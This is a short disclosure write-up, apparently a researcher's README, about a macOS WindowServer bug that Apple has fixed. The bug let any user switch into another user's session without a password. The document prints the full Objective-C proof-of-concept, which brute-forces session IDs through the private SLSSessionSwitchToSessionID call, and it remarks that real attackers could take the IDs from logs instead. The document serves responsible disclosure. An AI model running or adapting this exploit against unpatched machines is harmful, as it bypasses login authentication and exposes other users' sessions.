SkyLight user session exploit

While working on non-Metal acceleration in 2021, I stumbled on a WindowServer bug that allowed any user to switch to another user's session without entering a password. Apple fixed the bug in macOS 11.6.1 and 12.0.1 and paid me a generous bounty.

Bizarrely, the bug was reintroduced at some point in Ventura, and fixed again in late 2023.

thanks

ASentientHedgehog and Emma (916253) tested on countless versions and helped me navigate the reporting process. Thank you!

code

This is the program I submitted to Apple. It simply brute-forces session IDs against SLSSessionSwitchToSessionID, which lacked the necessary authorization checks. A real attacker would do something cleverer: session IDs are readily available in logs and other APIs, so there is no need to guess.

// clang -fmodules -F /System/Library/PrivateFrameworks -framework SkyLight thing.m -o thing
// Built without ARC (no -fobjc-arc), so the dictionary returned by the Copy function
// is released by hand below.
@import Foundation;

// Private SkyLight (WindowServer client) symbols. SLSSessionSwitchToSessionID is the
// call that lacked the check; these declarations are the minimum needed to link.
void SLSSessionSwitchToSessionID(int sessionID);
NSDictionary* SLSCopyCurrentSessionDictionary(void);
extern NSString* kCGSSessionOnConsoleKey;

int main() {
    // Try every session ID from 0 upwards until our own session is no longer on the console.
    for (int guess = 0;; guess++) {
        NSDictionary* dict = SLSCopyCurrentSessionDictionary();
        // Once another session owns the console, a switch has succeeded.
        if ([dict[kCGSSessionOnConsoleKey] isEqual:@false]) {
            printf("😁\n");
            return 0;
        }
        [dict release];
        SLSSessionSwitchToSessionID(guess);
    }
}